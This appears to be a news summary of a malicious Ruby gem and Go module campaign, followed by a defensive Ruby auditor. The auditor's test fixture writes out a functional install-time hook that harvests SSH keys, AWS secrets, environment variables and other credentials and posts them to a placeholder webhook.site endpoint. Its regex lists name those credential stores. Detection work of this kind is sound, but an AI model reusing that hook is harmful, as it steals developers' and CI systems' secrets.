
"The Ruby gems are designed to automate credential theft during install time, harvesting environment variables, SSH keys, AWS secrets, .npmrc, .netrc, GitHub CLI configuration, and RubyGems credentials. The stolen data is then exfiltrated to an attacker-controlled Webhook[.]site endpoint."
"The account is part of a software supply chain campaign targeting developers, CI runners, and build environments across two ecosystems, according to Socket security researcher Kirill Boychenko."
"The identified packages masquerade as recognizable and well-known modules like activesupport-logger, devise-jwt, go-retryablehttp, grpc-client, and config-loader so as to evade detection and trick users into downloading them."
A new software supply chain attack campaign has been identified that uses sleeper packages to deliver malicious payloads capable of credential theft, GitHub Actions tampering, and SSH persistence. The campaign is linked to the GitHub account 'BufferZoneCorp,' which published malicious Ruby gems and Go modules. The Ruby gems automate credential theft at install time, while the Go modules carry the broader capabilities. Although the packages were named to mimic well-known modules and evade detection, they have since been removed from RubyGems and blocked in the Go ecosystem.
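The reported gems combine two ingredients that a pre-install audit can look for: a gemspec that declares `extensions`, which makes `gem install` execute `extconf.rb` on the developer's or CI runner's machine, and code in that hook that reads credential stores and posts them to an external host. The following is an added example, not code from the article, from Socket, or from the malicious packages: a small Ruby auditor that unpacks a gem tree, flags install-time hooks, credential-file reads and exfiltration primitives, and returns a verdict. The pattern lists are illustrative heuristics, the sample gem tree is constructed in a temp directory to mimic the described behaviour, and the webhook URL in it is a placeholder with a zeroed UUID.

```ruby
# Added example (not from the article or the reported gems): heuristic
# pre-install audit of a gem tree for install-time credential theft.
require "fileutils"
require "tmpdir"

# Credential stores named in the report (paths are illustrative regexes).
CREDENTIAL_PATTERNS = {
  ssh_keys: %r{\.ssh/(id_|config|known_hosts)},
  aws:      %r{\.aws/(credentials|config)|AWS_(SECRET_ACCESS_KEY|ACCESS_KEY_ID|SESSION_TOKEN)},
  npmrc:    /\.npmrc/,
  netrc:    /\.netrc/,
  gh_cli:   %r{\.config/gh/hosts\.yml},
  rubygems: %r{\.gem/credentials},
  env_dump: /ENV\.(to_h|each|map|to_a)|ENV\.inspect/,
}.freeze

# Exfiltration primitives: outbound HTTP, an external URL, encoding of the loot.
EXFIL_PATTERNS = {
  http_post:    /Net::HTTP\.(post|post_form)|Net::HTTP::Post/,
  external_url: %r{https?://[\w.-]+}i,
  encoding:     /Base64\.(strict_)?encode64/,
}.freeze

# Walk an unpacked gem directory and collect findings as hashes.
def audit_gem_tree(root)
  findings = []
  # 1. A gemspec with `extensions` makes `gem install` run extconf.rb (arbitrary Ruby).
  Dir.glob(File.join(root, "*.gemspec")).each do |spec|
    if File.read(spec) =~ /\.extensions\s*=\s*\[?\s*["']([^"']+)["']/
      findings << { file: File.basename(spec), kind: :install_hook, detail: "extensions => #{$1}" }
    end
  end
  # 2. Scan every Ruby file for credential reads and exfil primitives.
  Dir.glob(File.join(root, "**", "*.rb")).each do |path|
    src = File.read(path)
    rel = path.sub("#{root}/", "")
    CREDENTIAL_PATTERNS.each do |name, re|
      findings << { file: rel, kind: :credential_read, detail: name.to_s } if src =~ re
    end
    EXFIL_PATTERNS.each do |name, re|
      next unless (m = src.match(re))
      findings << { file: rel, kind: :exfil, detail: "#{name}: #{m[0]}" }
    end
  end
  findings
end

# :block when all three ingredients coincide, :review when an install hook or
# exfil primitive appears alone (many legitimate native gems have extconf.rb).
def verdict(findings)
  kinds = findings.map { |f| f[:kind] }.uniq
  return :block  if %i[install_hook credential_read exfil].all? { |k| kinds.include?(k) }
  return :review if kinds.include?(:install_hook) || kinds.include?(:exfil)
  :pass
end

# Constructed mock gem tree that mimics the reported behaviour. The hook source
# is only written to disk and scanned; it is never executed.
def build_sample_gem(dir)
  FileUtils.mkdir_p(File.join(dir, "ext", "logger"))
  File.write(File.join(dir, "activesupport-logger.gemspec"), <<~'SPEC')
    Gem::Specification.new do |s|
      s.name = "activesupport-logger"   # typosquat-style name, constructed
      s.version = "1.0.0"
      s.extensions = ["ext/logger/extconf.rb"]
    end
  SPEC
  File.write(File.join(dir, "ext", "logger", "extconf.rb"), <<~'RB')
    require "net/http"; require "json"; require "base64"
    home = File.expand_path("~")
    loot = { env: ENV.to_h }
    ["#{home}/.ssh/id_rsa", "#{home}/.aws/credentials", "#{home}/.npmrc",
     "#{home}/.netrc", "#{home}/.config/gh/hosts.yml", "#{home}/.gem/credentials"].each do |f|
      loot[f] = (File.read(f) rescue nil)
    end
    # placeholder endpoint (zeroed UUID), not a real exfil address
    Net::HTTP.post(URI("https://webhook.site/00000000-0000-0000-0000-000000000000"),
                   Base64.strict_encode64(loot.to_json))
  RB
  dir
end

# Build the mock gem, audit it, and return findings plus verdict.
def run_sample
  Dir.mktmpdir("gem-audit") do |dir|
    findings = audit_gem_tree(build_sample_gem(dir))
    { findings: findings, verdict: verdict(findings) }
  end
end

if $PROGRAM_NAME == __FILE__
  result = run_sample
  result[:findings].each { |f| puts format("%-16s %-28s %s", f[:kind], f[:file], f[:detail]) }
  puts "verdict: #{result[:verdict]}"
end
```

On the mock tree the auditor reports the install hook from the gemspec, all seven credential-read patterns and the three exfil primitives from `extconf.rb`, and returns `:block`. A tree with an `extconf.rb` that only builds a native library yields `:review`, which is the right signal: native extensions are common, so the hook alone is a prompt to read the file, not a verdict.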
Read at The Hacker News